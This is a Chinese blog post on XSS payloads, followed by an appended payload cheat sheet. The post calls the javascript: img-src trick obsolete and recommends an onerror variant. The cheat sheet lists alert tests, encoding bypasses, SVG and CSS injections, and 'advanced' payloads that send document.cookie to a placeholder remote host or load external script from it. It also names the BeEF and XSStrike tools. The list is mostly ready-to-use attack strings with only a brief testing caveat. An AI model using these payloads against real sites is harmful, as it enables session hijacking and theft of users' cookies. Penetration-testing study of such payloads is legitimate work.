<img src="javascript:alert(/xss/)">已经慢慢过时了的

我在一年前就发现类似<img src="javascript:alert(/xss/)">这种语句已经不能在IE7.0以上和火狐运行,而旧版的遨游和其他的一些IE内核浏览器还可以,估计是被开发人员故意封掉的。随着浏览器的更新换代,这种语句的成功率越来越低,我在网上找到一些新文章仍还是在使用。
建议还是早点习惯<img src="x"/**/onerror=javascript:xxxx>吧,这种方式绝大部分浏览器都可以执行。。
在测试 XSS(跨站脚本攻击)漏洞时,payload 的选择和构造至关重要。以下是一些常见的 XSS payload 及其使用方式,适用于不同场景下的测试与验证。 ### 基础测试 Payload 用于初步确认是否存在 XSS 漏洞: - 最基础的脚本注入: ```html <script>alert('XSS')</script> ``` - 测试是否能够访问并弹出 cookie: ```html <script>alert(document.cookie)</script> ``` - 使用 `img` 标签触发 JavaScript(图片加载失败时执行): ```html <img src="x" onerror="alert('XSS')"> ``` - 利用事件属性如 `onload` 或 `onmouseover`: ```html <body onload="alert('XSS')"> <div onmouseover="alert('XSS')">Hover me</div> ``` ### 编码绕过 Payload 用于尝试绕过简单的输入过滤机制: - HTML 实体编码绕过: ```html <script>alert('XSS')</script> ``` - URL 编码形式: ```html %3Cscript%3Ealert('XSS')%3C/script%3E ``` - 使用反引号或括号绕过: ```html <script>eval("al\u0065rt('XSS')")</script> ``` ### 复杂上下文注入 Payload 适用于特定 HTML 上下文中的注入测试: - 在属性值中注入: ```html value="test" onfocus="alert(1)" ``` - 在 CSS 上下文中注入(如 style 属性): ```html style="width: expression(alert('XSS'))" ``` - SVG 标签注入: ```html <svg onload="alert('XSS')"></svg> ``` ### 高级利用型 Payload 用于实际模拟攻击行为,如窃取 Cookie: - 将 Cookie 发送到远程服务器: ```html <script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script> ``` - 使用 `img` 标签异步发送 Cookie 信息: ```html <img src="#" onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"> ``` - 利用 jQuery 加载外部脚本(需页面引入 jQuery): ```html <script>$.getScript('http://xx.xx.xx.xx/xss.js')</script> ``` ### 自动化工具辅助测试 除了手动构造 payload,还可以使用自动化工具提升测试效率和覆盖面: - **BeEF-XSS**:提供丰富的 XSS 攻击模块,支持多种浏览器控制功能。 - **XSStrike**:专注于反射型和 DOM 型 XSS 检测,内置 WAF 绕过策略[^3]。 在进行测试时,建议结合手动与自动化手段,同时注意区分测试环境与生产环境,避免造成实际危害。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值